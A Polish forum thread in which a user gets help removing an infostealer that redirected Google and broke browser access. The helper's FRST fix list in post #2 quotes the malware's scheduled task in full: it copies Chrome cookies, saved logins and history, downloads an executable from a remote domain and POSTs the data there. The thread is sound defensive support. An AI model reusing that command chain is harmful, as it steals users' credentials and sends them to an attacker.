logo elektroda
logo elektroda
X
logo elektroda
REKLAMA
REKLAMA
Adblock/uBlockOrigin/AdGuard mogą powodować znikanie niektórych postów z powodu nowej reguły.

[Rozwiązano] Dlaczego strony WWW nie otwierają się, mimo połączenia z siecią? Logi z FRST.

Spacewalker 14 Lip 2021 12:43 684 6
REKLAMA
  • #1 19520051
    Spacewalker
    Poziom 33  
    Posty: 1999
    Pomógł: 144
    Ocena: 551
    Witam, pomoże ktoś przeanalizować logi?

    Dopadło mnie coś, wchodzę na Google, a tam przekierowanie na 1web.com, sprawdziłem w chrome, nie było rozszerzenia.
    Znalazłem jakiś nowy program w programach z dzisiejszą datą i odinstalowałem.
    Potem dałem malware skaner, dałem do kw. to co mi nie pasowało, po resecie nie ma netu, tzn net jest, poczta, Skype, ale żadna z przeglądarek się nie łączy, nawet z routerem, pingi są, odbudowa połączenia sieciowego nie pomaga.
    Przywróciłem system, ale nie dało to nic.
    FRST nie może się połączyć w celu sprawdzenia update, mam nadzieje ze logi zrobił ok,

    Dziękuję za pomoc.
    Załączniki:
    • FRST.txt (59.94 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Addition.txt (67.66 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • REKLAMA
  • Pomocny post
    #2 19520072
    Kolobos
    Spec od komputerów
    Posty: 85178
    Pomógł: 17171
    Ocena: 10454
    Nie wstawia sie spacji przed przecinkami, znakami zapytania itd.

    Tak sie konczy bezmyslne pobieranie programow. Ta infekcja kradnie, ciastka i hasla z przegladarek (w logach widac tylko Chrome, ale nie widac calego wpisu), wiec wszystkie zmien, ktore miales zapamietane w przegladarce. Wyczysc tez wszystkie ciastka.
    Najlepiej odinstaluj Chrome z kasacja profilu przegladarki.

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    HKU\S-1-5-21-2209692828-470999809-654863888-1001\...\MountPoints2: {1e0e3291-d41b-11eb-91dd-7c2a31831b06} - "I:\AutoRun.exe"
    HKU\S-1-5-21-2209692828-470999809-654863888-1001\...\MountPoints2: {7cbe2981-ce9e-11eb-91dd-7c2a31831b06} - "F:\AutoRun.exe"
    HKU\S-1-5-21-2209692828-470999809-654863888-1001\...\MountPoints2: {f4df9a18-74a3-11ea-90ab-aced5c3e4b52} - "I:\HiSuiteDownLoader.exe"
    Startup: C:\Users\major\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk [2021-07-14] <==== UWAGA
    ShortcutTarget: SmartClock.lnk -> C:\Users\major\AppData\Roaming\Smart Clock\SmartClock.exe () [Brak podpisu cyfrowego] <==== UWAGA
    HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
    Task: {3E1E5F0C-00B8-4F61-BD3B-CFCDFA826E5D} - System32\Tasks\Check Volumes => C:\WINDOWS\SYSTEM32\CMD.EXE /C copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\major\AppData\Local\Temp\6DT8ZDTW39" > NUL && copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\major\AppData\Local\Temp\MLTGK6N8Z6" > NUL && copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Local State" "C:\Users\major\AppData\Local\Temp\160W4OB2H9" > NUL && "C:\Users\major\AppData\Local\Temp\J5HUZHYN9L.exe" http://1oivviovidwopopin.info/f2/5HSRZL989V.exe -s -k -o "C:\Users\major\AppData\Local\Temp\5HSRZL989V.exe" && cd C:\Users\major\AppData\Local\Temp\ && "5HSRZL989V.exe" S5RLINJDV2f2 6DT8ZDTW39 MLTGK6N8Z6 160W4OB2H9 & copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\major\AppData\Local\Temp\Q1ZDKEU5PW" > NUL && cd C:\Users\major\AppData\Local\Temp\ && "C:\Users\major\AppData\Local\Temp\J5HUZHYN9L.exe" -X POST -H "Content-type: application/octet-stream" --data @Q1ZDKEU5PW http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\major\AppData\Local\Temp\6DT8ZDTW39" > NUL && copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\major\AppData\Local\Temp\MLTGK6N8Z6" > NUL && copy /Y /B "C:\Us (dane wartości zawierają 719 znaków więcej). <==== UWAGA
    Task: {F174BFAA-329D-4E85-BE8C-74572D72633E} - System32\Tasks\Smart Clock => C:\Users\major\AppData\Roaming\Smart Clock\SmartClock.exe [237568 2021-07-14] () [Brak podpisu cyfrowego]
    ProxyEnable: [S-1-5-21-2209692828-470999809-654863888-1001] => Proxy [funkcja włączona]
    ProxyServer: [S-1-5-21-2209692828-470999809-654863888-1001] => 127.0.0.1:14683
    ManualProxies: 1127.0.0.1:14683
    RemoveProxy:
    R2 gupdate; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [565248 2021-07-14] (VideoLAN) [Brak podpisu cyfrowego]
    S3 gupdatem; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [565248 2021-07-14] (VideoLAN) [Brak podpisu cyfrowego]
    S2 Main Service; C:\Program Files (x86)\MachinerData\DBSCardRecovery.exe [2170880 2021-07-14] () [Brak podpisu cyfrowego]
    R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [565248 2021-07-14] (VideoLAN) [Brak podpisu cyfrowego] <==== UWAGA
    2021-07-14 09:04 - 2021-07-14 11:57 - 000000000 ____D C:\ProgramData\SoundFlowPicker
    2021-07-14 08:20 - 2021-07-14 08:20 - 000005418 _____ C:\WINDOWS\system32\Tasks\Check Volumes
    2021-07-14 08:19 - 2021-07-14 11:43 - 013834188 _____ C:\ProgramData\Vhxwcgzi.tmp
    2021-07-14 08:16 - 2021-07-14 11:56 - 000000000 ____D C:\Users\major\AppData\Roaming\Smart Clock
    2021-07-14 08:16 - 2021-07-14 08:16 - 000003090 _____ C:\WINDOWS\system32\Tasks\Smart Clock
    2021-07-14 08:16 - 2021-07-14 08:16 - 000000000 ____D C:\Program Files (x86)\foler
    2021-07-14 08:15 - 2021-07-14 11:56 - 000000000 ____D C:\Users\major\AppData\Roaming\redblur
    2021-07-14 08:15 - 2021-07-14 11:56 - 000000000 ____D C:\Program Files (x86)\MachinerData
    2021-07-14 08:15 - 2021-07-14 08:15 - 000003338 _____ C:\WINDOWS\system32\Tasks\Microsoft Windows Defender Update
    2021-07-14 08:15 - 2021-07-14 08:15 - 000000000 ____D C:\Users\major\AppData\Roaming\Asimen
    2021-07-14 08:14 - 2021-07-14 08:14 - 000000000 ____D C:\Users\major\AppData\Roaming\Q-Dir
    2021-07-14 09:08 - 2021-07-14 11:58 - 000000004 _____ () C:\ProgramData\lock.dat
    2021-07-14 09:09 - 2021-07-14 12:03 - 000000004 _____ () C:\ProgramData\rc.dat
    2021-07-14 09:08 - 2021-07-14 09:08 - 000000008 _____ () C:\ProgramData\ts.dat
    2021-05-29 11:32 - 2021-05-29 11:33 - 147510752 _____ (Weaver Software ) C:\ProgramData\Weaver Softwaresetup.exe

    Zrob skan przy pomocy mbam oraz AdwCleaner i usun to co wykryja. Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.
  • REKLAMA
  • #3 19521323
    Spacewalker
    Poziom 33  
    Posty: 1999
    Pomógł: 144
    Ocena: 551
    Wczoraj pisałem na kolanie tylko by załączyć logi.
    Załączam dziś nowe z FRST dla chętnych pomóc
    usunąłem wczoraj Chrome i wszystko z nim związane, dziś od rana walczę z instalacją chrome i mam tylko pasek postępu z informacją "przygotuj się...."
    i tak od godziny
    pobrałem tez pełną wersje offline, ale nie pomaga, jest tak samo
    Załączniki:
    • FRST.txt (55.02 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Addition.txt (71.32 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • REKLAMA
  • #4 19521338
    Kolobos
    Spec od komputerów
    Posty: 85178
    Pomógł: 17171
    Ocena: 10454
    Infekcja blokuje. Uzyles Adwc?

    Wykonaj Fixlist.txt:
    CloseProcesses:
    Task: {34B2D019-6B69-42AC-877D-5283C0A2267B} - \Microsoft Windows Defender Update -> Brak pliku <==== UWAGA
    Task: {AE24505F-1254-4235-B928-859EA4BEB57B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [565248 2021-07-14] (VideoLAN) [Brak podpisu cyfrowego]
    C:\Program Files (x86)\Google\
    Task: {ECC69D5E-1257-4B90-9D94-8DBF631FFDC8} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [681400 2021-07-15] (Mozilla Corporation -> Mozilla Foundation)
    R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [565248 2021-07-14] (VideoLAN) [Brak podpisu cyfrowego] <==== UWAGA
    2021-07-14 13:09 - 2021-07-15 09:46 - 000000004 _____ C:\ProgramData\rc.dat
    2021-07-14 13:08 - 2021-07-15 09:02 - 000000004 _____ C:\ProgramData\lock.dat
    2021-07-14 13:08 - 2021-07-14 13:08 - 000000008 _____ C:\ProgramData\ts.dat
    2021-07-14 13:03 - 2021-07-14 13:03 - 000000000 ____D C:\ProgramData\SoundFlowPicker

    Zamiesc Fixlog.txt oraz nowe logi, wczesniej zaznacz w FRST: Lista BCD.
  • REKLAMA
  • #5 19521382
    Spacewalker
    Poziom 33  
    Posty: 1999
    Pomógł: 144
    Ocena: 551
    Po naprawie w/w reset kompa
    wydaje mi się ze nie ma infekcji , w foxie nic nowego sie nie otwiera jak
    w adwc wykrywa tylko PUP.Optional.Legacy takie 3 wpisy
    HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{38F3DFDB-DFC2-4183-A0EF-5EC83A144E53}
    HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{270CE368-2E04-4976-8AEA-B348904D6CDB}
    HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A99E7D5D-9D7A-4634-A1F2-2B7EB16C9BFE}
    dac je do kwarantanny ?
    w malware byes czysto

    logi z FRES z opcją BCD , po napirawie
    Załączniki:
    • Addition.txt (69.89 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • FRST.txt (59.31 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • Pomocny post
    #6 19521389
    Kolobos
    Spec od komputerów
    Posty: 85178
    Pomógł: 17171
    Ocena: 10454
    Usun, do kasacji C:\FRST i to wszystko.
  • #7 19521541
    Spacewalker
    Poziom 33  
    Posty: 1999
    Pomógł: 144
    Ocena: 551
    dziekuje
    smiga .

Podsumowanie tematu

✨ Użytkownik zgłosił problem z dostępem do stron internetowych, mimo aktywnego połączenia z siecią. Po zainstalowaniu nieznanego programu i skanowaniu w poszukiwaniu malware, przeglądarki przestały działać, mimo że inne aplikacje, takie jak poczta i Skype, działały poprawnie. Użytkownik próbował przywrócić system, ale to nie przyniosło rezultatów. W odpowiedziach zasugerowano usunięcie zainfekowanych plików, reinstalację przeglądarki Chrome oraz użycie narzędzi do usuwania malware, takich jak AdwCleaner i FRST. Po wykonaniu sugerowanych kroków, użytkownik potwierdził, że problem został rozwiązany.
Podsumowanie AI na podstawie dyskusji. Może zawierać błędy.
REKLAMA